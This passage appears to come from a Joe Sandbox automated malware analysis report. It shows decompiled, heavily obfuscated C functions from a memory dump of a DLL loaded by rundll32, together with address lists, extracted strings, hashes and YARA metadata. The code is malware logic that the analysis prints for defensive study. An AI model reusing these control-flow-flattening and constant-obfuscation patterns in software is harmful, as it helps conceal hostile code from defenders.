				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00019a3d;
				_v112 = 0x2f15;
				_v112 = _v112 ^ 0x9e3db849;
				_v112 = _v112 >> 9;
				_v112 = _v112 * 0x50;
				_v112 = _v112 ^ 0x18b9e394;
				_v56 = 0xf91;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003e129f;
				_v108 = 0x8d56;
				_v108 = _v108 << 0xf;
				_v108 = _v108 ^ 0xf3b2534b;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 ^ 0x0000885e;
				_v116 = 0x58ab;
				_v116 = _v116 ^ 0x39457795;
				_v116 = _v116 << 7;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0028ab23;
				_v24 = 0xe1b7;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x0386d299;
				_v100 = 0x8399;
				_v100 = _v100 ^ 0xb4057ac8;
				_v100 = _v100 ^ 0x810196d4;
				_v100 = _v100 ^ 0x3504142b;
				goto L1;
				do {
					while(1) {
						L1:
						_t376 = _t366 - 0x1f0dfb0b;
						if(_t376 > 0) {
							break;
						}
						if(_t376 == 0) {
							_t320 = E10007544(_v44, _v140, _v144, _t338 + 0x18, _v104);
							_t368 =  &(_t368[3]);
							_t366 = 0x177163fa;
							_t365 = _t365 + _t320;
							continue;
						} else {
							if(_t366 == 0x5c5105d) {
								_t365 = _t365 + E10007E30();
							} else {
								if(_t366 == 0xe774bfd) {
									_t330 = E10007E30();
									_t368 = _t368 - 0xc + 0xc;
									_t366 = 0x24a30213;
									_t365 = _t365 + _t330;
									continue;
								} else {
									if(_t366 == 0x1438015d) {
										_t335 = E10007E30();
										_t368 = _t368 - 0xc + 0xc;
										_t366 = 0x1f0dfb0b;
										_t365 = _t365 + _t335;
										continue;
									} else {
										if(_t366 != 0x177163fa) {
											goto L19;
										} else {
											_t337 = E10007544(_v96, _v20, _v112, _t338 + 0x20, _v56);
											_t368 =  &(_t368[3]);
											_t366 = 0x5c5105d;
											_t365 = _t365 + _t337;
											continue;
										}
									}
								}
							}
						}
						L22:
						return _t365;
					}
					if(_t366 == 0x21c96020) {
						_t312 = E10007E30();
						_t368 = _t368 - 0xc + 0xc;
						_t366 = 0xe774bfd;
						_t365 = _t365 + _t312;
						goto L19;
					} else {
						if(_t366 == 0x24a30213) {
							_t317 = E10007E30();
							_t368 = _t368 - 0xc + 0xc;
							_t366 = 0x1438015d;
							_t365 = _t365 + _t317;
							goto L1;
						} else {
							if(_t366 == 0x25585055) {
								_t318 = E10007544(_v132, _v28, _v84, _t338, _v92);
								_t368 =  &(_t368[3]);
								_t366 = 0x21c96020;
								_t365 = _t365 + _t318;
								goto L1;
							} else {
								if(_t366 != 0x358f7696) {
									goto L19;
								} else {
									_t366 = 0x25585055;
									goto L1;
								}
							}
						}
					}
					goto L22;
					L19:
				} while (_t366 != 0xd1eac77);
				goto L22;
			}

0x10015daa
0x10015db0
0x10015dbd
0x10015dce
0x10015dd0
0x10015dd2
0x10015dd9
0x10015dde
0x10015de5
0x10015df1
0x10015df6
0x10015e00
0x10015e05
0x10015e0b
0x10015e13
0x10015e1b
0x10015e26
0x10015e31
0x10015e3c
0x10015e44
0x10015e4c
0x10015e54
0x10015e5c
0x10015e69
0x10015e6c
0x10015e70
0x10015e78
0x10015e80
0x10015e8b
0x10015e93
0x10015e9e
0x10015ea6
0x10015eb3
0x10015eb7
0x10015ebc
0x10015ec4
0x10015ed0
0x10015ed3
0x10015edc
0x10015ee0
0x10015ee8
0x10015ef0
0x10015ef5
0x10015efd
0x10015f05
0x10015f0d
0x10015f15
0x10015f1d
0x10015f25
0x10015f2d
0x10015f35
0x10015f3d
0x10015f45
0x10015f4d
0x10015f5a
0x10015f63
0x10015f67
0x10015f6f
0x10015f77
0x10015f81
0x10015f89
0x10015f91
0x10015fa0
0x10015fa3
0x10015fa7
0x10015faf
0x10015fb7
0x10015fbf
0x10015fc7
0x10015fcf
0x10015fd3
0x10015fdb
0x10015fee
0x10015ff5
0x10016000
0x10016008
0x10016010
0x10016015
0x1001601a
0x10016022
0x1001602f
0x10016033
0x10016038
0x10016040
0x10016048
0x10016058
0x1001605c
0x10016064
0x1001606c
0x10016074
0x10016080
0x10016083
0x10016087
0x1001608f
0x10016097
0x1001609f
0x100160a7
0x100160af
0x100160b7
0x100160bf
0x100160c3
0x100160cb
0x100160d3
0x100160db
0x100160e0
0x100160e8
0x100160f0
0x100160f8
0x10016100
0x10016108
0x10016110
0x10016118
0x10016122
0x10016126
0x1001612e
0x10016139
0x10016141
0x1001614c
0x10016154
0x1001615c
0x10016166
0x1001616a
0x10016172
0x1001617a
0x1001617f
0x10016187
0x1001618f
0x10016199
0x100161a1
0x100161a6
0x100161ae
0x100161b6
0x100161be
0x100161c3
0x100161c8
0x100161d0
0x100161db
0x100161e3
0x100161ee
0x100161f6
0x100161fe
0x10016206
0x10016206
0x1001620e
0x1001620e
0x1001620e
0x1001620e
0x10016210
0x00000000
0x00000000
0x10016216
0x100162cb
0x100162d0
0x100162d3
0x100162d8
0x00000000
0x1001621c
0x10016222
0x100163b0
0x10016228
0x1001622e
0x100162a0
0x100162a5
0x100162a8
0x100162ad
0x00000000
0x10016230
0x10016236
0x1001627f
0x10016284
0x10016287
0x10016289
0x00000000
0x10016238
0x1001623e
0x00000000
0x10016244
0x1001625b
0x10016260
0x10016263
0x10016268
0x00000000
0x10016268
0x1001623e
0x10016236
0x1001622e
0x10016222
0x100163b2
0x100163be
0x100163be
0x100162e5
0x10016375
0x1001637a
0x1001637d
0x10016382
0x00000000
0x100162e7
0x100162ed
0x1001634b
0x10016350
0x10016353
0x10016358
0x00000000
0x100162ef
0x100162f5
0x10016321
0x10016326
0x10016329
0x1001632e
0x00000000
0x100162f7
0x100162fd
0x00000000
0x10016303
0x10016303
0x00000000
0x10016303
0x100162fd
0x100162f5
0x100162ed
0x00000000
0x10016384
0x10016384
0x00000000

Strings

UPX%, xrefs: 10016303
^R, xrefs: 10016038
C6, xrefs: 10015E1B
|<, xrefs: 10015E80
Cu, xrefs: 100160F0
E, xrefs: 1001605C
UPX%, xrefs: 100162EF
Y,, xrefs: 10015F05
Yb^q, xrefs: 10015E54
w, xrefs: 10016097

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C6$Cu$UPX%$UPX%$Y,$Yb^q$^R$w$|<$E
API String ID: 0-937103397
Opcode ID: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction ID: e91972674f3eb71ba7037216d4b2c91072d805a8743603f57f5014319008b3a2
Opcode Fuzzy Hash: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction Fuzzy Hash: 93E102718083818FD3A4CF64D88954BFBF1BBC4748F108A1DF5EA9A260D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100137F4, Relevance: 11.5, Strings: 9, Instructions: 244
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E100137F4() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t242;
				signed int _t247;
				void* _t249;
				void* _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t278;
				signed int _t281;
				void* _t282;
				void* _t287;
				signed int* _t289;
				void* _t297;

				_t289 =  &_v684;
				_v580 = 0x2c23da;
				asm("stosd");
				_t250 = 0;
				_t252 = 0x3c;
				asm("stosd");
				_t282 = 0x19809088;
				asm("stosd");
				_v640 = 0xf0d1;
				_v640 = _v640 << 2;
				_v640 = _v640 | 0x5b158a51;
				_v640 = _v640 ^ 0x5b17cbd5;
				_v596 = 0xd18a;
				_v596 = _v596 * 0x68;
				_v596 = _v596 ^ 0x00552011;
				_v624 = 0x272d;
				_v624 = _v624 / _t252;
				_v624 = _v624 ^ 0x00001784;
				_v644 = 0xc09;
				_v644 = _v644 << 8;
				_v644 = _v644 | 0xf1f4736a;
				_v644 = _v644 ^ 0xf1fc5cf6;
				_v616 = 0xc6c6;
				_v616 = _v616 + 0xffff298f;
				_v616 = _v616 ^ 0xffff9aa4;
				_v664 = 0x880f;
				_v664 = _v664 >> 0xd;
				_v664 = _v664 + 0xfac7;
				_v664 = _v664 ^ 0x0000c275;
				_v632 = 0x6cb7;
				_v632 = _v632 + 0x71ae;
				_v632 = _v632 ^ 0xf12e281f;
				_v632 = _v632 ^ 0xf12e892c;
				_v648 = 0x35dc;
				_t253 = 0x11;
				_v648 = _v648 / _t253;
				_v648 = _v648 ^ 0x6afc1010;
				_v648 = _v648 ^ 0x6afc6648;
				_v592 = 0xf9c9;
				_v592 = _v592 + 0xdff3;
				_v592 = _v592 ^ 0x0001b583;
				_v680 = 0x7b8d;
				_t254 = 3;
				_v680 = _v680 * 0x34;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 << 0xe;
				_v680 = _v680 ^ 0x00063d51;
				_v604 = 0xd1fb;
				_v604 = _v604 / _t254;
				_v604 = _v604 ^ 0x000016e7;
				_v600 = 0x6d4a;
				_v600 = _v600 | 0xe95b5ca0;
				_v600 = _v600 ^ 0xe95b5d58;
				_v656 = 0xa6d5;
				_v656 = _v656 * 0x2c;
				_v656 = _v656 ^ 0x2fdaf6b8;
				_v656 = _v656 ^ 0x2fc61d34;
				_v636 = 0x2da6;
				_t255 = 0x61;
				_v636 = _v636 / _t255;
				_v636 = _v636 << 0xf;
				_v636 = _v636 ^ 0x003c31b2;
				_v620 = 0x6f0c;
				_v620 = _v620 + 0x94cb;
				_v620 = _v620 ^ 0x00015a96;
				_v608 = 0x32b0;
				_v608 = _v608 + 0x3f32;
				_v608 = _v608 ^ 0x00007dd4;
				_v684 = 0x29d;
				_v684 = _v684 + 0xad7f;
				_v684 = _v684 | 0x819b4d84;
				_t256 = 0x72;
				_v684 = _v684 / _t256;
				_v684 = _v684 ^ 0x012311d1;
				_v660 = 0x64d5;
				_v660 = _v660 | 0xb65d9e9f;
				_v660 = _v660 + 0xffff3959;
				_v660 = _v660 ^ 0xb65d035f;
				_v612 = 0x140;
				_v612 = _v612 >> 0xf;
				_v612 = _v612 ^ 0x00002c68;
				_v676 = 0xfbaa;
				_v676 = _v676 >> 8;
				_v676 = _v676 + 0x1669;
				_v676 = _v676 ^ 0x03abbef6;
				_v676 = _v676 ^ 0x03ab9f96;
				_v628 = 0xebed;
				_v628 = _v628 + 0x7cae;
				_t257 = 0x47;
				_t281 = _v624;
				_v628 = _v628 * 0x47;
				_v628 = _v628 ^ 0x006452eb;
				_v672 = 0xe594;
				_v672 = _v672 >> 0xc;
				_v672 = _v672 / _t257;
				_v672 = _v672 | 0x6c4d1fae;
				_v672 = _v672 ^ 0x6c4d687d;
				_v668 = 0x6152;
				_v668 = _v668 >> 0xa;
				_v668 = _v668 | 0x4751a645;
				_v668 = _v668 ^ 0x4751bfac;
				_v652 = 0x7c78;
				_t258 = 0x4c;
				_v652 = _v652 / _t258;
				_v652 = _v652 ^ 0x3b31093c;
				_v652 = _v652 ^ 0x3b31089c;
				do {
					while(_t282 != 0xc4cab9f) {
						if(_t282 == 0x1828ae29) {
							_t242 = E10008C0C(_v624, __eflags, _v644, _v616,  &_v524);
							_t289 =  &(_t289[3]);
							__eflags = _t242;
							if(__eflags == 0) {
								L11:
								return _t250;
							}
							_t282 = 0x19f95bd8;
							continue;
						}
						if(_t282 == 0x19809088) {
							_t282 = 0x1828ae29;
							continue;
						}
						if(_t282 == 0x19f95bd8) {
							_t278 = _v596;
							_t281 = E1000492A(_v652, _t278, _v664, _v632, _v648, _v652, _v640, _v592, _v652,  &_v524, _t250, _v680, _v604, _v600);
							_t289 =  &(_t289[0xc]);
							__eflags = _t281 - 0xffffffff;
							if(__eflags == 0) {
								goto L11;
							}
							_t282 = 0x27d5d232;
							continue;
						}
						if(_t282 == 0x27d5d232) {
							_t247 = E100153AE(_v656, _v636, _v620, _t258, _t281, _v608,  &_v564);
							_t258 = _t281;
							_t278 = _v684;
							asm("sbb esi, esi");
							_t282 = ( ~_t247 & 0xfed365d9) + 0xd7945c6;
							E100078F0(_t281, _t278, _v660, _v612, _v676);
							_t289 =  &(_t289[9]);
							goto L19;
						}
						if(_t282 != 0x32ff9f3c) {
							goto L19;
						}
						_t249 = E100023BC();
						_t287 = _v588 - _v548;
						asm("sbb ecx, [esp+0x9c]");
						_t297 = _v584 - _t278;
						if(_t297 >= 0 && (_t297 > 0 || _t287 >= _t249)) {
							_t250 = 1;
						}
						goto L11;
					}
					E10012092(_v628,  &_v588, _v672, _v668);
					_pop(_t258);
					_t282 = 0x32ff9f3c;
					L19:
					__eflags = _t282 - 0xd7945c6;
				} while (__eflags != 0);
				goto L11;
			}

0x100137f4
0x100137fa
0x1001380e
0x1001380f
0x10013813
0x10013816
0x10013817
0x1001381c
0x1001381d
0x10013825
0x1001382a
0x10013832
0x1001383a
0x10013847
0x1001384b
0x10013853
0x10013863
0x10013867
0x1001386f
0x10013877
0x1001387c
0x10013884
0x1001388c
0x10013894
0x1001389c
0x100138a4
0x100138ac
0x100138b1
0x100138b9
0x100138c1
0x100138c9
0x100138d1
0x100138d9
0x100138e1
0x100138ed
0x100138f2
0x100138f8
0x10013900
0x10013908
0x10013910
0x10013918
0x10013920
0x1001392d
0x10013930
0x10013934
0x10013939
0x1001393e
0x10013946
0x10013954
0x10013958
0x10013960
0x10013968
0x10013970
0x10013978
0x10013985
0x10013989
0x10013991
0x1001399b
0x100139a7
0x100139ac
0x100139b2
0x100139bc
0x100139c4
0x100139cc
0x100139d4
0x100139dc
0x100139e4
0x100139ec
0x100139f4
0x100139fc
0x10013a04
0x10013a10
0x10013a15
0x10013a1b
0x10013a23
0x10013a2b
0x10013a33
0x10013a3b
0x10013a43
0x10013a4b
0x10013a50
0x10013a58
0x10013a60
0x10013a65
0x10013a6d
0x10013a75
0x10013a7d
0x10013a85
0x10013a92
0x10013a95
0x10013a99
0x10013a9d
0x10013aa5
0x10013aad
0x10013aba
0x10013abe
0x10013ac6
0x10013ace
0x10013ad6
0x10013adb
0x10013ae3
0x10013aeb
0x10013af7
0x10013afa
0x10013afe
0x10013b06
0x10013b0e
0x10013b0e
0x10013b1c
0x10013c44
0x10013c49
0x10013c4c
0x10013c4e
0x10013b79
0x10013b82
0x10013b82
0x10013c54
0x00000000
0x10013c54
0x10013b28
0x10013c29
0x00000000
0x10013c29
0x10013b34
0x10013c01
0x10013c11
0x10013c13
0x10013c16
0x10013c19
0x00000000
0x00000000
0x10013c1f
0x00000000
0x10013c1f
0x10013b40
0x10013b9d
0x10013ba8
0x10013bb4
0x10013bb8
0x10013bc0
0x10013bc6
0x10013bcb
0x00000000
0x10013bcb
0x10013b48
0x00000000
0x00000000
0x10013b4e
0x10013b57
0x10013b62
0x10013b69
0x10013b6b
0x10013b75
0x10013b75
0x00000000
0x10013b6b
0x10013c6e
0x10013c74
0x10013c75
0x10013c7a
0x10013c7a
0x10013c7a
0x00000000

Strings

X][, xrefs: 10013970
}hMl, xrefs: 10013AC6
<1;, xrefs: 10013AFE
x|, xrefs: 10013AEB
h,, xrefs: 10013A50
2?, xrefs: 100139E4
Ra, xrefs: 10013ACE
Rd, xrefs: 10013A9D
-', xrefs: 10013853

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -'$2?$<1;$Ra$X][$h,$x|$}hMl$Rd
API String ID: 0-2401909234
Opcode ID: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
Instruction ID: 5388816bb5d1eecf1ba6e6649f08daf6316018bad176c26ee88db10dcf1e4ca8
Opcode Fuzzy Hash: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
Instruction Fuzzy Hash: 61B110725083809FE358CF65C48A94BBBE2FBC4358F108A1DF5959A2A0D7B5D948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10015115, Relevance: 11.4, Strings: 9, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10015115() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t125;
				void* _t126;
				signed int _t138;
				signed int _t139;
				intOrPtr _t141;
				signed int _t143;
				signed int* _t144;

				_t144 =  &_v568;
				_v528 = 0x5aebe;
				_t141 = 0;
				_t126 = 0xdd78c1f;
				_v524 = 0;
				_v568 = 0xe0a6;
				_v568 = _v568 + 0xefcc;
				_v568 = _v568 >> 3;
				_v568 = _v568 + 0xffffba73;
				_v568 = _v568 ^ 0xfffff0ad;
				_v564 = 0x6b83;
				_t138 = 0x25;
				_v564 = _v564 / _t138;
				_v564 = _v564 << 2;
				_v564 = _v564 >> 2;
				_v564 = _v564 ^ 0x0000048b;
				_v556 = 0xe5d8;
				_t139 = 0x1f;
				_v556 = _v556 * 0x31;
				_v556 = _v556 ^ 0x577859bf;
				_v556 = _v556 / _t139;
				_v556 = _v556 ^ 0x02d16e7d;
				_v552 = 0x540d;
				_v552 = _v552 * 0x44;
				_v552 = _v552 * 0x6c;
				_v552 = _v552 + 0xffff4b52;
				_v552 = _v552 ^ 0x096ab6e1;
				_v548 = 0x2240;
				_v548 = _v548 | 0x13356285;
				_v548 = _v548 ^ 0x133520ec;
				_v560 = 0x478b;
				_v560 = _v560 >> 4;
				_v560 = _v560 + 0x6d64;
				_v560 = _v560 + 0xffffa9cd;
				_v560 = _v560 ^ 0x00004ab1;
				_v532 = 0x9667;
				_v532 = _v532 << 4;
				_v532 = _v532 ^ 0x00090457;
				_t140 = _v548;
				_t143 = _v548;
				_t125 = _v548;
				_v540 = 0x3ff9;
				_v540 = _v540 * 0x59;
				_v540 = _v540 | 0xbbcf382b;
				_v540 = _v540 ^ 0xbbdf4460;
				_v536 = 0x71ad;
				_v536 = _v536 ^ 0xa8de0853;
				_v536 = _v536 ^ 0xa8de4efe;
				_v544 = 0x526a;
				_v544 = _v544 | 0x2fe28bf9;
				_v544 = _v544 ^ 0x2fe2ff10;
				do {
					while(_t126 != 0xdd78c1f) {
						if(_t126 == 0x116c8390) {
							_t117 = E1000929E();
							_t140 = _t117;
							__eflags = _t117;
							if(__eflags == 0) {
								L9:
								return _t141;
							}
							_t126 = 0x1a95d21f;
							continue;
						}
						if(_t126 == 0x1326aa4f) {
							_t120 = E10001E13(_v548, _v560, _v532, _v540,  &_v520);
							_t144 =  &(_t144[3]);
							_t143 = _t120;
							_t126 = 0x217dee79;
							continue;
						}
						if(_t126 == 0x1a95d21f) {
							_t122 = E1000D44C(_t140, _v564, __eflags, _t126,  &_v520, _v556, _v552);
							_t144 =  &(_t144[4]);
							__eflags = _t122;
							if(__eflags == 0) {
								goto L9;
							}
							_t126 = 0x1326aa4f;
							continue;
						}
						if(_t126 == 0x217dee79) {
							_t125 = E1001C424(_t143, _v544);
							_t126 = 0x3152545d;
							continue;
						}
						if(_t126 != 0x3152545d) {
							goto L17;
						}
						_v568 = 0x3661;
						_v568 = _v568 << 0xe;
						_v568 = _v568 * 5;
						_v568 = _v568 + 0xbb88;
						_v568 = _v568 ^ 0x69defb6a;
						if(_t125 == _v568) {
							_t141 = 1;
						}
						goto L9;
					}
					_t126 = 0x116c8390;
					L17:
					__eflags = _t126 - 0x64d23cb;
				} while (__eflags != 0);
				goto L9;
			}

0x10015115
0x1001511b
0x10015128
0x1001512a
0x1001512f
0x10015133
0x1001513b
0x10015143
0x10015148
0x10015150
0x10015158
0x10015167
0x1001516c
0x10015172
0x10015177
0x1001517c
0x10015184
0x10015191
0x10015192
0x10015196
0x100151a4
0x100151a8
0x100151b0
0x100151bd
0x100151c6
0x100151ca
0x100151d2
0x100151da
0x100151e2
0x100151ea
0x100151f2
0x100151fa
0x100151ff
0x10015207
0x1001520f
0x10015217
0x1001521f
0x10015224
0x1001522c
0x10015230
0x10015234
0x10015238
0x10015245
0x10015249
0x10015251
0x10015259
0x10015261
0x10015269
0x10015271
0x10015279
0x10015281
0x10015289
0x10015289
0x1001529b
0x10015378
0x1001537d
0x1001537f
0x10015381
0x100152f9
0x10015304
0x10015304
0x10015387
0x00000000
0x10015387
0x100152a7
0x10015360
0x10015365
0x10015368
0x1001536a
0x00000000
0x1001536a
0x100152b3
0x10015335
0x1001533a
0x1001533d
0x1001533f
0x00000000
0x00000000
0x10015341
0x00000000
0x10015341
0x100152bb
0x10015315
0x10015317
0x00000000
0x10015317
0x100152c3
0x00000000
0x00000000
0x100152c9
0x100152d1
0x100152db
0x100152df
0x100152e7
0x100152f3
0x100152f7
0x100152f7
0x00000000
0x100152f3
0x10015391
0x10015396
0x10015396
0x10015396
0x00000000

Strings

a6, xrefs: 100152C9
@", xrefs: 100151DA
y}!, xrefs: 1001536A
T, xrefs: 100151B0
y}!, xrefs: 100152B5
]TR1, xrefs: 100152BD
dm, xrefs: 100151FF
jR, xrefs: 10015271
]TR1, xrefs: 10015317

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T$@"$]TR1$]TR1$a6$dm$jR$y}!$y}!
API String ID: 0-2886613653
Opcode ID: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
Instruction ID: 092e755a5dcb822a0ee83699db47e88b3ee05a0ce695016b2a566ce4ce8947d0
Opcode Fuzzy Hash: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
Instruction Fuzzy Hash: 51514571508341DFD384CF65C48541FBBE1FBC8798F144A1EF5A69A260D3B9CA898F86

Uniqueness

Uniqueness Score: -1.00%

Function 1000620A, Relevance: 10.4, Strings: 8, Instructions: 375
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000620A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				signed int _v132;
				intOrPtr _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* _t338;
				intOrPtr _t364;
				void* _t377;
				signed int _t380;
				intOrPtr _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr _t395;
				void* _t422;
				intOrPtr* _t430;
				signed int _t433;
				intOrPtr _t438;
				signed int* _t440;
				void* _t443;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t338);
				_v80 = 0xcc9d;
				_t440 =  &(( &_v168)[6]);
				_t386 = 0;
				_t433 = 0x16bff9b6;
				_t438 = 0;
				_t388 = 0x11;
				_v80 = _v80 / _t388;
				_v80 = _v80 + 0xffff11cc;
				_v80 = _v80 ^ 0xffff7c6a;
				_v44 = 0x1a06;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x00002b89;
				_v160 = 0x27c9;
				_v160 = _v160 >> 9;
				_v160 = _v160 << 7;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x0004f334;
				_v168 = 0x8961;
				_v168 = _v168 + 0x1e8b;
				_v168 = _v168 << 0x10;
				_v168 = _v168 ^ 0xca952250;
				_v168 = _v168 ^ 0x6d795972;
				_v40 = 0xb8c6;
				_t389 = 0x25;
				_v40 = _v40 / _t389;
				_v40 = _v40 ^ 0x00002ddd;
				_v140 = 0xf458;
				_v140 = _v140 + 0x660b;
				_v140 = _v140 << 0xd;
				_t390 = 0x3b;
				_v140 = _v140 / _t390;
				_v140 = _v140 ^ 0x00bbd1d1;
				_v84 = 0x2cf9;
				_v84 = _v84 ^ 0xe2cb4fb4;
				_v84 = _v84 | 0x3d81796a;
				_v84 = _v84 ^ 0xffcb5ef8;
				_v156 = 0xe047;
				_v156 = _v156 + 0xec23;
				_v156 = _v156 | 0xc96a13e4;
				_v156 = _v156 ^ 0x1a962ea6;
				_v156 = _v156 ^ 0xd3fdba9b;
				_v108 = 0x4236;
				_v108 = _v108 >> 8;
				_v108 = _v108 + 0xffff4e26;
				_v108 = _v108 ^ 0xffff2512;
				_v24 = 0xcb45;
				_t391 = 0x77;
				_v24 = _v24 * 0xf;
				_v24 = _v24 ^ 0x000bb0ab;
				_v100 = 0xb258;
				_v100 = _v100 * 0x6b;
				_v100 = _v100 / _t391;
				_v100 = _v100 ^ 0x0000cac4;
				_v16 = 0xab6c;
				_v16 = _v16 + 0x630c;
				_v16 = _v16 ^ 0x0001587e;
				_v20 = 0xcdcd;
				_v20 = _v20 + 0xffff01ab;
				_v20 = _v20 ^ 0xfffff9e5;
				_v60 = 0xefa6;
				_t392 = 0x4c;
				_v60 = _v60 * 0x26;
				_v60 = _v60 ^ 0x0023a95c;
				_v112 = 0x9292;
				_v112 = _v112 + 0xffff5686;
				_v112 = _v112 / _t392;
				_v112 = _v112 ^ 0x035e352f;
				_v96 = 0x9b3d;
				_v96 = _v96 + 0xb399;
				_v96 = _v96 + 0xffffc9ce;
				_v96 = _v96 ^ 0x000113bb;
				_v152 = 0x851e;
				_v152 = _v152 + 0x4a3f;
				_v152 = _v152 | 0x2010aaec;
				_t393 = 0xa;
				_v152 = _v152 * 0x5f;
				_v152 = _v152 ^ 0xe64968ad;
				_v124 = 0x3cc7;
				_v124 = _v124 << 0xe;
				_v124 = _v124 + 0x9bc0;
				_v124 = _v124 ^ 0x0f321da8;
				_v116 = 0xd63e;
				_v116 = _v116 + 0x90bc;
				_v116 = _v116 * 0x13;
				_v116 = _v116 ^ 0x001aea95;
				_v32 = 0xbd6a;
				_v32 = _v32 | 0xd1e4c041;
				_v32 = _v32 ^ 0xd1e4a4ec;
				_v88 = 0xac52;
				_v88 = _v88 | 0x10312b45;
				_v88 = _v88 * 0x50;
				_v88 = _v88 ^ 0x0f86db5e;
				_v52 = 0xe981;
				_v52 = _v52 | 0xae117bb0;
				_v52 = _v52 ^ 0xae11932c;
				_v144 = 0x1dfb;
				_v144 = _v144 | 0x48b114e1;
				_v144 = _v144 + 0xfffff9cd;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x0916476d;
				_v56 = 0xf206;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00005f8d;
				_v92 = 0xe052;
				_v92 = _v92 + 0x2471;
				_v92 = _v92 + 0xffffdbed;
				_v92 = _v92 ^ 0x0000938e;
				_v68 = 0xe0f9;
				_v68 = _v68 * 0x31;
				_v68 = _v68 + 0xffff857e;
				_v68 = _v68 ^ 0x002a9bd7;
				_v48 = 0x94fa;
				_v48 = _v48 / _t393;
				_v48 = _v48 ^ 0x00004295;
				_v132 = 0xaea7;
				_v132 = _v132 | 0xc9193032;
				_v132 = _v132 ^ 0x9bfcaca0;
				_v132 = _v132 + 0xffff6354;
				_v132 = _v132 ^ 0x52e462fc;
				_v76 = 0xa7e3;
				_v76 = _v76 | 0xf0f94981;
				_v76 = _v76 + 0xffff9c41;
				_v76 = _v76 ^ 0xf0f9e006;
				_v164 = 0x36ff;
				_v164 = _v164 + 0xffff2d0d;
				_v164 = _v164 + 0x7fd2;
				_t394 = 0x7d;
				_v164 = _v164 * 0x77;
				_v164 = _v164 ^ 0xfff2f01d;
				_v120 = 0xc712;
				_v120 = _v120 | 0x5aa592ba;
				_v120 = _v120 + 0x46e1;
				_v120 = _v120 ^ 0x5aa67fba;
				_v28 = 0x86a8;
				_t395 = _v136;
				_v28 = _v28 / _t394;
